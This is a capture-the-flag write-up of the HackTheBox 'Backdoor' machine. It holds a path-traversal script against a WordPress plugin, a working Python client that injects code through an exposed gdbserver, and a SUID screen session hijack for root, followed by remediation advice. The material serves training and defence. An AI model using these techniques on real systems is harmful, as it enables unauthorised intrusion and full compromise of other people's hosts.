Writeup - Backdoor (HTB)
4 min read

This is a writeup for the Backdoor machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV

Three TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 8.2p1)
  • 80/tcp : web server (Apache 2.4.41)
  • 1337/tcp : unknown service (nmap cannot match the banner)

So we have a website on port 80 and an unidentified service on port 1337; let's start with the site.


After inspecting the page, I notice that it runs the WordPress CMS. Let's scan it with WPScan to look for flaws:

Nothing special. Let's try an aggressive plugin detection instead, with the following command:

wpscan --url http://backdoor.htb --plugin-detection aggressive

There are two plugins: akismet and ebook-download. After some research I find that ebook-download version 1.1 is vulnerable to a path traversal in filedownload.php: the ebookdownloadurl parameter lets an unauthenticated visitor read arbitrary files from the server (CVE-.

So we write a script that uses this traversal to walk the process list: if the response is larger than 82 bytes (the size returned for a PID that does not exist), the process exists.

import requests

BASE = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
# /proc/<pid>/cmdline is assumed here: the path is cut off in the original listing.
for i in range(1, 1000):
    resp = requests.get(BASE + "/proc/%d/cmdline" % i)
    lg = len(resp.text)
    # 82 bytes is the response size for a PID that does not exist.
    if lg > 82 and '1337' in resp.text:
        print("%d %d %s" % (i, lg, resp.text.replace("\x00", " ")))

After running the script, we find two matching processes:

Both are gdbserver, listening on our mystery port 1337. So we can now look for exploits against gdbserver.

I quickly find the following script, which allows remote code execution through the gdbserver service:

GNU gdbserver 9.2 - Remote Command Execution (RCE) (remote exploit for the Linux platform)

After generating a payload with msfvenom, I run the script:
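The exploit-db script is not reproduced here. As an added example (not the writeup's code and not the exploit-db script), the following shows the GDB Remote Serial Protocol exchange that any such script relies on: gdbserver has no authentication, so anyone who can reach the port can read registers, write memory and resume the debuggee, which is all that is needed to run a payload. Assumptions made here: the x86-64 layout of the "g" register packet (rip is the 17th 8-byte register), the host name backdoor.htb and port 1337 from the scan, and a scripted in-memory stand-in for gdbserver so the exchange can run offline.

```python
import binascii
import struct

# Assumed x86-64 layout of the 'g' (read all registers) reply, following gdb's
# amd64 target description: rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp, r8..r15,
# then rip; each register is 8 bytes, hex-encoded, little-endian.
RIP_INDEX = 16
REG_BYTES = 8


def rsp_checksum(payload: bytes) -> int:
    """RSP checksum: sum of the payload bytes modulo 256."""
    return sum(payload) % 256


def rsp_encode(payload: bytes) -> bytes:
    """Frame a packet as $<payload>#<two hex digits>. The payloads used here
    are plain ASCII/hex, so the '}' escaping of '$', '#', '}' is not needed."""
    return b"$" + payload + b"#%02x" % rsp_checksum(payload)


def rsp_decode(frame: bytes) -> bytes:
    """Strip the framing, verify the checksum and return the payload."""
    if len(frame) < 4 or frame[:1] != b"$" or frame[-3:-2] != b"#":
        raise ValueError("malformed RSP frame: %r" % frame)
    payload, cksum = frame[1:-3], int(frame[-2:], 16)
    if cksum != rsp_checksum(payload):
        raise ValueError("bad RSP checksum")
    return payload


class RspClient:
    """Minimal synchronous client; works over anything with sendall()/recv()."""

    def __init__(self, sock):
        self.sock = sock
        self.buf = b""

    def _read_frame(self) -> bytes:
        while True:
            self.buf = self.buf.lstrip(b"+")  # drop acknowledgements
            end = self.buf.find(b"#")
            if self.buf[:1] == b"$" and end != -1 and len(self.buf) >= end + 3:
                frame, self.buf = self.buf[:end + 3], self.buf[end + 3:]
                return frame
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("gdbserver closed the connection")
            self.buf += chunk

    def exchange(self, payload: bytes) -> bytes:
        """Send one packet, wait for its reply, acknowledge the reply with '+'."""
        self.sock.sendall(rsp_encode(payload))
        reply = rsp_decode(self._read_frame())
        self.sock.sendall(b"+")
        return reply


def read_rip(client: RspClient) -> int:
    """Read all registers with 'g' and pick rip out of the assumed layout."""
    regs = client.exchange(b"g")
    start = RIP_INDEX * REG_BYTES * 2
    return struct.unpack("<Q", binascii.unhexlify(regs[start:start + REG_BYTES * 2]))[0]


def write_memory(client: RspClient, addr: int, data: bytes) -> None:
    """'M addr,len:hexbytes' writes into the debuggee; gdbserver answers 'OK'."""
    reply = client.exchange(b"M%x,%x:" % (addr, len(data)) + binascii.hexlify(data))
    if reply != b"OK":
        raise RuntimeError("memory write refused: %r" % reply)


def inject_and_resume(client: RspClient, payload: bytes) -> int:
    """Overwrite the code at the current instruction pointer and resume.
    'vCont;c' gets no reply until the target stops again, so do not wait.
    Returns the address that was written."""
    rip = read_rip(client)
    write_memory(client, rip, payload)
    client.sock.sendall(rsp_encode(b"vCont;c"))
    return rip


class ScriptedServer:
    """Constructed stand-in for gdbserver (not captured traffic) so the
    exchange runs offline: replies are scripted, sent data is recorded."""

    def __init__(self, replies):
        self.replies = list(replies)
        self.sent = []

    def sendall(self, data: bytes) -> None:
        self.sent.append(data)

    def recv(self, _n: int) -> bytes:
        return self.replies.pop(0) if self.replies else b""


def demo():
    """Offline run: the fake target reports rip = 0x401000 and accepts the write."""
    regs = b"00" * REG_BYTES * RIP_INDEX + b"0010400000000000"
    server = ScriptedServer([b"+" + rsp_encode(regs), b"+" + rsp_encode(b"OK")])
    addr = inject_and_resume(RspClient(server), b"\xcc")  # int3 as a placeholder
    return addr, server.sent
```

Against the real target, RspClient would wrap `socket.create_connection(("backdoor.htb", 1337))` and the payload would be the raw msfvenom output (`-f raw`) instead of the int3 placeholder. The point to take away for defence is that nothing in this exchange is an exploit in the usual sense: reading registers, writing memory and continuing are the protocol's ordinary operations, which is why exposing gdbserver on a reachable port is equivalent to exposing a shell.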

I now have a shell on the remote machine, I can get the first flag.

Privilege escalation

First I look for SUID binaries with the following command:

find / -perm -u=s -type f 2>/dev/null

Most of them are the usual commands, but the list also contains "screen", a terminal multiplexer that manages several terminals in one session. I then check whether a process is running it:

And indeed there is one. Not just any process: a root shell started with the options -dmS:

  • -d : start detached; the session is created without attaching a terminal
  • -m : ignore the $STY environment variable and force the creation of a new session
  • -S : give the new session a meaningful name (here, "root")

So a screen session named root has been created by the root user. If we manage to attach to it, we get a root shell.

To attach to the detached session of another user we use the following command (this only works because screen is SUID root here):

screen -x [name]/[user]

But before attaching we have to set the TERM environment variable, since screen needs a terminal type to attach; I use the following command:

export TERM=screen

I can now attach to the root session with the following command:

screen -x root/root

I now have access to a root shell and can retrieve the last flag.


To patch this host, I think the following actions would be necessary:

  • Update or remove the ebook-download WordPress plugin (the path traversal is in the plugin, not in WordPress core)
  • Do not expose gdbserver on a network port: it has no authentication and executing code in the debuggee is its intended function, so updating it does not help; bind it to localhost or tunnel it over SSH if remote debugging is needed
  • Remove the SUID bit from screen and do not leave a detached root session that unprivileged users can attach to

Owned Backdoor from Hack The Box!